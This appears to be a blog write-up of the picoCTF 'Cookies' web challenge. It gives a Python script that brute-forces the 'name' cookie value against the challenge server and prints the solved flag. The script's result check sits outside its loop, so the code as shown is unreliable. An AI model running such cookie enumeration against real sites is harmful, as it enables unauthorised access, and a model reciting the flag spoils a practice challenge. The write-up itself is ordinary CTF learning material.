picoCTF Cookies [40points]

發表於2022-03-20|更新於2024-09-01|CTF

|閱讀量:

[Web Exploitation] Cookies - 40points

初始畫面

輸入snickerdoodle，發現進入畫面不一樣

嘗試撰寫暴力破解腳本

#!/bin/python3
import requests
for i in range(25):
    cookie = 'name={}'.format(i)
    headers = {'Cookie':cookie}
    
    r = requests.get('http://mercury.picoctf.net:<port>/check', headers=headers)
if (r.status_code == 200) and ('picoCTF' in r.text):
        print(r.text)

取得FLAG

FLAG:picoCTF{3v3ry1_l0v3s_c00k135_064663be}

文章作者: LuYee6813

文章連結: https://luyee6813.github.io/CTF/picoCTF/Web%20Exploitation/Cookies/2022-03-20-Cookies/

版權聲明: 本部落格所有文章除特別聲明外，均採用 CC BY-NC-SA 4.0 許可協議。轉載請註明來自 LuYee6813's Blog | 技術分享！

picoCTF Web Exploit

相關推薦

picoCTF GET aHEAD [50 points]

picoCTF Who are you? [100 points]

picoCTF It is my Birthday [100 points]

picoCTF buffer overflow 0 [100 points]

picoCTF vault-door-training [50 points]

picoCTF 2024 Forensic - Binary Search

資料庫載入中